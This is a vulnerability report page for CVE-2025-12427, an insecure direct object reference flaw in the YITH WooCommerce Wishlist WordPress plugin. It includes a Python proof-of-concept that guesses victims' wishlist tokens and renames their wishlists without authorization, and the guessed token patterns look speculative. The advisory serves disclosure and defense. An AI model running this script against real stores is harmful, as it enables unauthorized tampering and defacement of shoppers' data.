Security Vulnerability Report
中文
CVE-2025-12427 CVSS 5.3 MEDIUM

CVE-2025-12427

Published: 2025-11-19 04:16:04
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YITH WooCommerce Wishlist < 4.10.0
YITH WooCommerce Wishlist <= 4.10.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12427 PoC - YITH WooCommerce Wishlist IDOR # Discover wishlist token and rename victim's wishlist import requests import json TARGET_URL = "https://vulnerable-site.com/wp-json/yith-wcwl/v1/lists" AJAX_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php" # Step 1: Discover user wishlist token via REST API def discover_wishlist_token(user_id): """Enumerate wishlist tokens by guessing token patterns""" headers = { "Content-Type": "application/json", "X-WP-Nonce": "" # May not be required for public endpoints } # Try common token patterns token_patterns = [ f"user_{user_id}_wishlist", f"{user_id}_default", f"wishlist_{user_id}" ] for token in token_patterns: response = requests.get(f"{TARGET_URL}/{token}", headers=headers) if response.status_code == 200: return token return None # Step 2: Rename victim's wishlist via AJAX (IDOR exploit) def rename_wishlist(token, new_name): """Exploit IDOR to rename any user's wishlist without authorization""" data = { "action": "yith_wcwl_rename_wishlist", "wishlist_id": token, "wishlist_name": new_name, "nonce": "" # May not be required or can be bypassed } response = requests.post(AJAX_URL, data=data) return response.status_code == 200 # Step 3: Rename via REST API def rename_via_rest_api(token, new_name): """Alternative: Rename wishlist via REST API""" headers = { "Content-Type": "application/json" } payload = {"name": new_name} response = requests.patch( f"{TARGET_URL}/{token}", headers=headers, json=payload ) return response.status_code == 200 # Main execution if __name__ == "__main__": # Example: Target user ID 123 user_id = 123 new_wishlist_name = "HACKED - Defaced Wishlist" print(f"[*] Discovering wishlist token for user {user_id}...") token = discover_wishlist_token(user_id) if token: print(f"[+] Found token: {token}") print(f"[*] Attempting to rename wishlist to: {new_wishlist_name}") if rename_wishlist(token, new_wishlist_name): print("[+] SUCCESS: Wishlist renamed via AJAX!") elif rename_via_rest_api(token, new_wishlist_name): print("[+] SUCCESS: Wishlist renamed via REST API!") else: print("[-] FAILED: Could not rename wishlist") else: print("[-] FAILED: Could not discover wishlist token")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12427", "sourceIdentifier": "[email protected]", "published": "2025-11-19T04:16:04.243", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L265", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L97", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdb95ac-6b22-44a9-bd5c-b802a2d908d7?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.